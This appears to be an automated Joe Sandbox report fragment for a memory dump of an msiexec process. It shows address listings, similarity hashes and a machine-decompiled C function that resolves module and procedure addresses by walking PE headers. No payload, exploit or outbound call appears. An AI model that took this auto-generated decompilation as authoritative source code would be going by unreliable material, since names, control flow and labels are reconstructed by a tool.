                              0x04d759a7
                              0x04d759a7
                              0x00000000
                              0x04d759a7
                              0x04d7587d
                              0x00000000
                              0x04d7588b
                              0x04d7588b
                              0x04d75890
                              0x04d75892
                              0x04d75894
                              0x04d75899
                              0x04d7589b
                              0x04d758a0
                              0x04d758a0
                              0x04d758aa
                              0x04d758b2
                              0x04d758b6
                              0x04d758be
                              0x04d758c6
                              0x04d758c9
                              0x04d7590d
                              0x04d75917
                              0x04d7591a
                              0x04d7591c
                              0x04d75920
                              0x04d75928
                              0x04d7592a
                              0x04d7592c
                              0x04d7592e
                              0x04d7592e
                              0x04d758cb
                              0x04d758cd
                              0x04d758d8
                              0x04d758e0
                              0x04d758f4
                              0x04d758fe
                              0x04d758fe
                              0x04d7593a
                              0x04d7593e
                              0x04d75940
                              0x04d75942
                              0x00000000
                              0x04d75944
                              0x04d75944
                              0x04d75949
                              0x04d7594e
                              0x04d7594e
                              0x04d75953
                              0x04d7595b
                              0x04d75976
                              0x04d75976
                              0x04d7597a
                              0x04d7597f
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d75981
                              0x04d75981
                              0x04d75981
                              0x04d75983
                              0x04d75988
                              0x04d7598d
                              0x04d75991
                              0x04d75991
                              0x00000000
                              0x04d7595d
                              0x04d7595d
                              0x04d75963
                              0x04d75965
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d75967
                              0x04d75967
                              0x04d7596b
                              0x04d7596d
                              0x00000000
                              0x00000000
                              0x04d7596f
                              0x04d75971
                              0x04d75971
                              0x04d75974
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d75974
                              0x00000000
                              0x04d75967
                              0x04d7595b
                              0x04d75942
                              0x04d75863
                              0x04d32143
                              0x04d32143
                              0x04d32149
                              0x04d3214f
                              0x04d322f1
                              0x04d322f6
                              0x00000000
                              0x04d32173
                              0x04d32173
                              0x04d3217d
                              0x04d32181
                              0x04d32186
                              0x04d759ae
                              0x04d759b2
                              0x04d759b5
                              0x04d759b7
                              0x04d759ba
                              0x04d759cd
                              0x04d759d1
                              0x04d759d5
                              0x04d759d9
                              0x04d759db
                              0x00000000
                              0x00000000
                              0x04d759dd
                              0x04d759dd
                              0x04d759e1
                              0x04d759e4
                              0x04d759e7
                              0x04d759ee
                              0x04d759ee
                              0x04d759f3
                              0x04d759f3
                              0x00000000
                              0x04d32186
                              0x04d3214f
                              0x04d32106
                              0x04d32266
                              0x04d320d8
                              0x04d320da
                              0x04d320e0
                              0x00000000
                              0x00000000
                              0x00000000

                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 07eb98d0fa2ec5474c9ba29c705fac4c00c3037a1544e425515796a62b07cd48
                              • Instruction ID: 248cfc91b59fdc9f57f95cd6ee2b187f524eb38ac956059fc2344ee26dd0df71
                              • Opcode Fuzzy Hash: 07eb98d0fa2ec5474c9ba29c705fac4c00c3037a1544e425515796a62b07cd48
                              • Instruction Fuzzy Hash: 01F1D235B08341AFEB25CF28C95076A77E1BF85325F08899DE9959B680E734F841CB93
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 04D1D5E0 Relevance: .4, Instructions: 353COMMONCrypto
                              Download Yara Rule
                              C-Code - Quality: 87%
                              			E04D1D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x4dfd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E04D16600(0x4df52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x4df7b9c; // 0x0
							_t281 = L04D24620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E04D4F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x4df7b90; // 0x770b0000
								if(_t384 == 0) {
									_t353 =  *0x4df7b8c; // 0x3052ae0
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E04D22280(_t200, 0x4df84d8);
									_t277 =  *0x4df85f4; // 0x3058858
									_t351 =  *0x4df85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x30587f0
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E04D1FFB0(_t287, _t353, 0x4df84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E04D5CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E04D16600(0x4df52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E04D17926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x4dfb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E04D8E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x4df8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x4dfb218; // 0x4d7ed9e9
														asm("ror edi, cl");
														 *0x4dfb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E04D22280(_t250, 0x4df84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L04D43898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E04D1FFB0(_t293, _t353, 0x4df84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E04D437F5(_t353, 0);
																}
																E04D40413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E04D39B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E04D302D6(_t174);
																}
																L04D277F0( *0x4df7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E04D3C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L04D1EC7F(_t353);
										L04D319B8(_t287, 0, _t353, 0);
										_t200 = E04D0F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E04D4B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x4dfb2f8; // 0xee0000
									if((_t206 |  *0x4dfb2fc) == 0 || ( *0x4dfb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x4dfb2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E04DB6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E04DB6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E04D1E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L04D1EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E04D49730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E04D1E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L04D18F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04D43C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                              0x04d1d5f2
                              0x04d1d5f5
                              0x04d1d5f5
                              0x04d1d5fd
                              0x04d1d600
                              0x04d1d60a
                              0x04d1d60d
                              0x04d1d617
                              0x04d1d61d
                              0x04d1d627
                              0x04d1d62e
                              0x04d1d911
                              0x04d1d913
                              0x00000000
                              0x04d1d919
                              0x04d1d919
                              0x04d1d919
                              0x04d1d634
                              0x04d1d634
                              0x04d1d634
                              0x04d1d634
                              0x04d1d640
                              0x04d1d8bf
                              0x00000000
                              0x04d1d646
                              0x04d1d646
                              0x04d1d64d
                              0x04d1d652
                              0x04d6b2fc
                              0x04d6b2fc
                              0x04d6b302
                              0x04d6b33b
                              0x04d6b341
                              0x00000000
                              0x04d6b304
                              0x04d6b304
                              0x04d6b319
                              0x04d6b31e
                              0x04d6b324
                              0x04d6b326
                              0x04d6b332
                              0x04d6b347
                              0x04d6b34c
                              0x04d6b351
                              0x04d6b35a
                              0x00000000
                              0x04d6b328
                              0x04d6b328
                              0x00000000
                              0x04d6b328
                              0x04d6b326
                              0x04d1d658
                              0x04d1d658
                              0x04d1d65b
                              0x04d1d665
                              0x00000000
                              0x04d1d66b
                              0x04d1d66b
                              0x04d1d66b
                              0x04d1d66b
                              0x04d1d66d
                              0x04d1d672
                              0x04d1d67a
                              0x00000000
                              0x00000000
                              0x04d1d680
                              0x04d1d686
                              0x04d1d8ce
                              0x04d1d8d4
                              0x04d1d8dd
                              0x04d1d8e0
                              0x04d1d68c
                              0x04d1d691
                              0x04d1d69d
                              0x04d1d6a2
                              0x04d1d6a7
                              0x04d1d6b0
                              0x04d1d6b5
                              0x04d1d6e0
                              0x04d1d6b7
                              0x04d1d6b7
                              0x04d1d6b9
                              0x04d1d6b9
                              0x04d1d6bb
                              0x04d1d6bd
                              0x04d1d6ce
                              0x04d1d6d0
                              0x04d1d6d2
                              0x04d6b363
                              0x04d6b365
                              0x00000000
                              0x04d6b36b
                              0x00000000
                              0x04d6b36b
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d1d6bf
                              0x04d1d6bf
                              0x04d1d6e5
                              0x04d1d6e7
                              0x04d1d6e9
                              0x04d1d6ec
                              0x04d1d6ec
                              0x04d1d6ef
                              0x04d1d6f5
                              0x04d1d6f9
                              0x04d1d6fb
                              0x04d1d6fd
                              0x04d1d701
                              0x04d1d703
                              0x04d1d70a
                              0x04d1d70a
                              0x04d1d701
                              0x04d1d710
                              0x04d1d710
                              0x04d1d6c1
                              0x04d1d6c1
                              0x04d1d6c6
                              0x04d6b36d
                              0x04d6b36f
                              0x00000000
                              0x04d6b375
                              0x04d6b375
                              0x04d6b375
                              0x00000000
                              0x04d6b375
                              0x00000000
                              0x04d1d6cc
                              0x04d1d6d8
                              0x04d1d6d8
                              0x04d1d6d8
                              0x00000000
                              0x04d1d6c6
                              0x04d1d6bf
                              0x00000000
                              0x04d1d6da
                              0x04d1d6da
                              0x04d1d716
                              0x04d1d71b
                              0x04d1d720
                              0x04d1d726
                              0x04d1d726
                              0x04d1d72d
                              0x00000000
                              0x04d1d733
                              0x04d1d739
                              0x04d1d742
                              0x04d1d750
                              0x04d1d758
                              0x04d1d764
                              0x04d1d776
                              0x04d1d77a
                              0x04d1d783
                              0x04d1d928
                              0x04d1d92c
                              0x04d1d93d
                              0x04d1d944
                              0x04d1d94f
                              0x04d1d954
                              0x04d1d956
                              0x04d1d95f
                              0x04d1d961
                              0x04d1d973
                              0x04d1d973
                              0x04d1d956
                              0x04d1d944
                              0x04d1d92c
                              0x04d1d78b
                              0x04d6b394
                              0x04d1d791
                              0x04d1d798
                              0x04d6b3a3
                              0x04d6b3bb
                              0x04d6b3bb
                              0x04d1d7a5
                              0x04d1d866
                              0x04d1d870
                              0x04d1d884
                              0x04d1d892
                              0x04d1d898
                              0x04d1d89e
                              0x04d1d8a0
                              0x04d1d8a6
                              0x04d1d8ac
                              0x04d1d8ae
                              0x04d1d8b4
                              0x04d1d8b4
                              0x04d1d8ae
                              0x04d1d7a5
                              0x04d1d78b
                              0x04d1d7b1
                              0x04d6b3c5
                              0x04d6b3c5
                              0x04d1d7c3
                              0x04d1d7ca
                              0x04d1d7e5
                              0x04d1d7eb
                              0x04d1d8eb
                              0x04d1d8ed
                              0x00000000
                              0x04d1d8f3
                              0x04d1d8f3
                              0x04d1d8f3
                              0x00000000
                              0x04d1d8ed
                              0x04d1d7cc
                              0x04d1d7cc
                              0x04d1d7d2
                              0x00000000
                              0x04d1d7d4
                              0x04d1d7d4
                              0x04d1d7d7
                              0x04d1d7df
                              0x04d6b3d4
                              0x04d6b3d9
                              0x04d6b3dc
                              0x04d6b3dc
                              0x04d6b3df
                              0x04d6b3e2
                              0x04d6b468
                              0x04d6b46d
                              0x04d6b46f
                              0x04d6b46f
                              0x04d6b475
                              0x04d1d8f8
                              0x04d1d8f9
                              0x04d1d8fd
                              0x04d6b3e8
                              0x04d6b3e8
                              0x04d6b3eb
                              0x04d6b3ed
                              0x00000000
                              0x04d6b3ef
                              0x04d6b3ef
                              0x04d6b3f1
                              0x04d6b3f4
                              0x04d6b3fe
                              0x04d6b404
                              0x04d6b409
                              0x04d6b40e
                              0x04d6b410
                              0x04d6b410
                              0x04d6b414
                              0x04d6b414
                              0x04d6b41b
                              0x04d6b420
                              0x04d6b423
                              0x04d6b425
                              0x04d6b427
                              0x04d6b42a
                              0x04d6b42d
                              0x04d6b42d
                              0x04d6b42a
                              0x04d6b432
                              0x04d6b436
                              0x04d6b438
                              0x04d6b43b
                              0x04d6b43b
                              0x04d6b449
                              0x04d6b44e
                              0x04d6b454
                              0x04d6b458
                              0x04d6b458
                              0x04d6b45d
                              0x00000000
                              0x04d6b45d
                              0x04d6b3ed
                              0x00000000
                              0x00000000
                              0x00000000
                              0x04d1d7df
                              0x04d1d7d2
                              0x04d1d7ca
                              0x04d6b37c
                              0x04d6b37e
                              0x04d6b385
                              0x04d6b38a
                              0x00000000
                              0x04d6b38a
                              0x04d1d742
                              0x04d1d7f1
                              0x04d1d7f8
                              0x04d6b49b
                              0x04d6b49b
                              0x04d1d800
                              0x04d1d837
                              0x04d1d843
                              0x04d1d845
                              0x04d1d847
                              0x04d1d84a
                              0x04d1d84b
                              0x04d1d84e
                              0x04d1d857
                              0x04d1d802
                              0x04d1d802
                              0x04d1d80d
                              0x00000000
                              0x04d1d818
                              0x04d1d818
                              0x04d1d824
                              0x04d1d831
                              0x04d6b4a5
                              0x04d6b4ab
                              0x04d6b4b3
                              0x04d6b4b8
                              0x04d6b4bb
                              0x00000000
                              0x04d6b4c1
                              0x04d6b4c1
                              0x04d6b4c8
                              0x00000000
                              0x04d6b4ce
                              0x04d6b4d4
                              0x04d6b4e1
                              0x04d6b4e3
                              0x04d6b4e5
                              0x00000000
                              0x04d6b4eb
                              0x04d6b4f0
                              0x04d6b4f2
                              0x04d1dac9
                              0x04d1dacc
                              0x04d1dacf
                              0x04d1dad1
                              0x04d1dd78
                              0x04d1dd78
                              0x04d1dcf2
                              0x00000000
                              0x04d1dad7
                              0x04d1dad9
                              0x04d1dadb
                              0x00000000
                              0x00000000
                              0x04d1dae1
                              0x04d1dae1
                              0x04d1dae4
                              0x04d1dae6
                              0x04d6b4f9
                              0x04d6b4f9
                              0x04d6b500
                              0x04d1daec
                              0x04d1daec
                              0x04d1daf5
                              0x04d1daf8
                              0x04d1dafb
                              0x04d1db03
                              0x04d1db11
                              0x04d1db16
                              0x04d1db19
                              0x04d1db1b
                              0x04d6b52c
                              0x04d6b531
                              0x04d6b534
                              0x04d1db21
                              0x04d1db21
                              0x04d1db24
                              0x04d1dcd9
                              0x04d1dce2
                              0x04d1dce5
                              0x04d1dd6a
                              0x04d1dd6d
                              0x00000000
                              0x04d1dd73
                              0x04d6b51a
                              0x04d6b51c
                              0x04d6b51f
                              0x04d6b524
                              0x00000000
                              0x04d6b524
                              0x04d1dce7
                              0x04d1dce7
                              0x04d1dce7
                              0x00000000
                              0x04d1dce7
                              0x00000000
                              0x04d1db2a
                              0x04d1db2c
                              0x04d1db31
                              0x04d1db33
                              0x04d1db36
                              0x04d1db39
                              0x04d1db3b
                              0x04d1db66
                              0x04d1db66
                              0x04d1db3d
                              0x04d1db3d
                              0x04d1db3e
                              0x04d1db46
                              0x04d1db47
                              0x04d1db49
                              0x04d1db4c
                              0x04d1db53
                              0x04d1db55
                              0x04d1db58
                              0x04d1db5a
                              0x04d6b50a
                              0x04d6b50f
                              0x04d6b512
                              0x04d1db60
                              0x04d1db60
                              0x04d1db63
                              0x04d1db63
                              0x00000000
                              0x04d1db63
                              0x04d1db5a
                              0x04d1db3b
                              0x04d1db24
                              0x04d1db69
                              0x04d1db69
                              0x04d1db6c
                              0x04d1db6f
                              0x04d1db74
                              0x04d6b557
                              0x04d6b557
                              0x04d6b55e
                              0x04d1db7a
                              0x04d1db7c
                              0x04d1db7f
                              0x04d1db82
                              0x04d1db85
                              0x00000000
                              0x04d1db8b
                              0x04d1db8b
                              0x04d1db8d
                              0x04d1db9b
                              0x04d1db9b
                              0x04d1db9d
                              0x04d1dba0
                              0x04d1dba2
                              0x04d1dba4
                              0x04d1dba7
                              0x04d1dba9
                              0x04d1dbae
                              0x04d1dbae
                              0x04d1dbb1
                              0x04d1dbb4
                              0x04d1dbb4
                              0x04d1dbb7
                              0x04d1dbba
                              0x04d1dcd2
                              0x04d1dcd4
                              0x00000000
                              0x04d1dbc0
                              0x04d1dbc0
